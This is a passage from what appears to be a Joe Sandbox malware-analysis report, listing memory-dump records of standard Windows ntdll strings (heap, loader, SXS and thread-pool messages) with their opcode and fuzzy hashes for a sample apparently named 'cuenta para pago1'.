                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      • Opcode ID: f8d6baa7147518041166a1beaa2d4bfe7a1eab98f72b02c7e0d2bc69f6a1450b
                                                                                      • Instruction ID: fef255ea64330a7e085de8ed0c7f70ceaf191a76026b8507c04c0c2a7b66d545
                                                                                      • Opcode Fuzzy Hash: f8d6baa7147518041166a1beaa2d4bfe7a1eab98f72b02c7e0d2bc69f6a1450b
                                                                                      • Instruction Fuzzy Hash: 5842FD75208385DFEB05CF68C884A2ABBE9FF88244F044A6DE595CB752DB30E945CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      • Opcode ID: 53863a1bd10cb6b7588fbea3690e92e3c0bf583810b5815640f8b621d5c8a397
                                                                                      • Instruction ID: 46123b98111b68d21533be78cc2a1a7ab4229a6a1f3af29e8e873f6a40a806b3
                                                                                      • Opcode Fuzzy Hash: 53863a1bd10cb6b7588fbea3690e92e3c0bf583810b5815640f8b621d5c8a397
                                                                                      • Instruction Fuzzy Hash: BAC11575A06319AFEB14CF6CC880BBE77A9AF47344F5443ADE811AB294DBB4C844C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 34931FA9
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34931F82
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 34931FC9
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34931F8A
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 34931F6F
                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 34931F6A, 34931FA4, 34931FC4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                      • API String ID: 0-861424205
                                                                                      • Opcode ID: 8197b6fe60644096a07f7f74bb146a32ff83dd982b40fd7e79bd25af7983c80f
                                                                                      • Instruction ID: 7716c36df4830555abf6a400a1db047fb0485210732ab163334b45a4668fc6bf
                                                                                      • Opcode Fuzzy Hash: 8197b6fe60644096a07f7f74bb146a32ff83dd982b40fd7e79bd25af7983c80f
                                                                                      • Instruction Fuzzy Hash: 3A31E37AB01224BFFB108A85EC46F5BBB6CDB41790F014299B900B7355D772EE00DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-4253913091
                                                                                      • Opcode ID: 441c65234934e4a9bd11d37f36630d7366fdc80ee9fe6abe97167f1cb8803f28
                                                                                      • Instruction ID: f6ccad7071c1d5f1ff9b8e40359007fb07258586733d6a4ae41721d5ac1c2fe2
                                                                                      • Opcode Fuzzy Hash: 441c65234934e4a9bd11d37f36630d7366fdc80ee9fe6abe97167f1cb8803f28
                                                                                      • Instruction Fuzzy Hash: E3F1AC74B01709DFEB15CF68C884B6AB7B9FF86344F1082A9E5159B385DB34E981CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-2283098728
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 349380F3
                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 349380E9
                                                                                      • Failed to reallocate the system dirs string !, xrefs: 349380E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1783798831
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 34944519
                                                                                      • LdrpCheckRedirection, xrefs: 3494450F
                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34944508
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 3446177414-3154609507
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • WindowsExcludedProcs, xrefs: 348E514A
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 348E519B
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 348E5167
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 348E5272
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 348E534B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                      • API String ID: 0-3061284088
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 348C0586
                                                                                      • kLsE, xrefs: 348C05FE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                      • API String ID: 3446177414-2547482624
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                      • API String ID: 0-379654539
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 349320C0
                                                                                      • .Local, xrefs: 348F27F8
                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 34931FE3, 349320BB
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 34931FE8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                      • API String ID: 0-1239276146
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 34920E2F
                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 34920DEC
                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 34920EB5
                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 34920E72
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                      • API String ID: 0-1468400865
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      • API String ID: 0-2586055223
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                      • API String ID: 0-1168191160
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • HEAP: , xrefs: 348C14B6
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 348C1648
                                                                                      • HEAP[%wZ]: , xrefs: 348C1632
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 349300C7
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 349300F1
                                                                                      • RTL: Re-Waiting, xrefs: 34930128
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                      • API String ID: 0-1145731471
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                      • API String ID: 0-2779062949
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                      • API String ID: 0-318774311
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3499B3AA
                                                                                      • TargetNtPath, xrefs: 3499B3AF
                                                                                      • GlobalizationUserSettings, xrefs: 3499B3B4
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                      • API String ID: 0-505981995
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3491E455
                                                                                      • HEAP: , xrefs: 3491E442
                                                                                      • HEAP[%wZ]: , xrefs: 3491E435
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                      • API String ID: 0-1340214556
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • LdrpCompleteMapModule, xrefs: 3492A39D
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 3492A396
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 3492A3A7
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3496D7B2
                                                                                      • HEAP: , xrefs: 3496D79F
                                                                                      • HEAP[%wZ]: , xrefs: 3496D792
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                      • API String ID: 0-3815128232
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                      • API String ID: 0-1151232445
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • GlobalFlag, xrefs: 3494B30F
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3494B2B2
                                                                                      • @, xrefs: 3494B2F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: db21f1522f0ede3fb17c4597ce833fbdb0eacfbc98d94329234dae99b092ea40
                                                                                      • Instruction ID: c67b14f70fcf7e0aaeb43589370404c6af9173cc76b84247ba9ba61cc0224d50
                                                                                      • Opcode Fuzzy Hash: db21f1522f0ede3fb17c4597ce833fbdb0eacfbc98d94329234dae99b092ea40
                                                                                      • Instruction Fuzzy Hash: D6312CB5E01209EFEB10DFA5DC80AEEBBBCEF44744F4044A9E615AB255D7749E04CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3490119B
                                                                                      • BuildLabEx, xrefs: 3490122F
                                                                                      • @, xrefs: 349011C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                      • API String ID: 0-3051831665
                                                                                      • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                      • Instruction ID: 459c00ad99d2d3699e5b6ab73fe1d9fb895ef63c647cdd5efd41b21e8e815363
                                                                                      • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                      • Instruction Fuzzy Hash: 4F3152B2901619FFEB21DB98CC45E9EBB7DEB44750F108125E514E7150DB31DD058F90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 349485DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                      • API String ID: 0-702105204
                                                                                      • Opcode ID: fad3916961d83e1750702c7f654991243a55f882524ac62da9e84688015c1834
                                                                                      • Instruction ID: 2feaea057769710c7bcd57cb86f4c20413215954ce390c79bc72199a7f0320e4
                                                                                      • Opcode Fuzzy Hash: fad3916961d83e1750702c7f654991243a55f882524ac62da9e84688015c1834
                                                                                      • Instruction Fuzzy Hash: 5701F239604204DFFAE6EE54D844A5A7B6EEF413A8F4009ECE64116B52CB20AC41CE98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: 81ccf8d3d1297c7b8a1fcbe4f4c79413171738b1ed64035b4419bfe28ab44a50
                                                                                      • Instruction ID: 95484406ee15ed76b22771538a4cb8d3eafa0718cea365a46f6f3705b03fed17
                                                                                      • Opcode Fuzzy Hash: 81ccf8d3d1297c7b8a1fcbe4f4c79413171738b1ed64035b4419bfe28ab44a50
                                                                                      • Instruction Fuzzy Hash: A932CFB460A3158FD754CF18C480B2EB7F5EF8A744F504A2EF9958B6A0EB34C944CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: c9956ce68362f2e78ea8dfb627f27b0a77c222b76db76e3d17a19b35d8acdb5b
                                                                                      • Instruction ID: 34609d0aaba004fffc4a1d4424a925f958bd8ffc9ce25a3666eee6f6ca3131ec
                                                                                      • Opcode Fuzzy Hash: c9956ce68362f2e78ea8dfb627f27b0a77c222b76db76e3d17a19b35d8acdb5b
